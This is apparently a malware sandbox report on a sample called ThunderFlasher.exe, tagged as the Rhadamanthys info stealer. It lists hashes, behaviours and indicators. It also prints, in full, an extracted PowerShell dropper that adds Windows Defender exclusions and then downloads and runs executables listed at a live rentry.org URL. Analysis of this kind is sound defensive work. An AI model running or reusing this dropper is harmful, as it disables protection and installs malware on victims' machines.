General

  • Target

    ThunderFlasher.exe

  • Size

    7KB

  • Sample

    240628-js9yasyejg

  • MD5

    b5e479d3926b22b59926050c29c4e761

  • SHA1

    a456cc6993d12abe6c44f2d453d7ae5da2029e24

  • SHA256

    fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

  • SHA512

    09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

  • SSDEEP

    192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Malware Config

Extracted

Language
ps1
Source
1
<#bji#> Add-MpPreference <#gap#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zkd#> -Force <#hep#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/lem61111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#nmy#> (Join-Path <#cpg#> -Path $env:AppData <#jig#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#bwf#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#nzz#> (Join-Path -Path $env:AppData <#qua#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#idz#>
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Targets

    • Target

      ThunderFlasher.exe

    • Size

      7KB

    • MD5

      b5e479d3926b22b59926050c29c4e761

    • SHA1

      a456cc6993d12abe6c44f2d453d7ae5da2029e24

    • SHA256

      fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

    • SHA512

      09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

    • SSDEEP

      192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

    • Rhadamanthys

      Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Blocklisted process makes network request

    • Creates new service(s)

    • Downloads MZ/PE file

    • Stops running service(s)

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Legitimate hosting services abused for malware hosting/C2

    • Power Settings

      powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.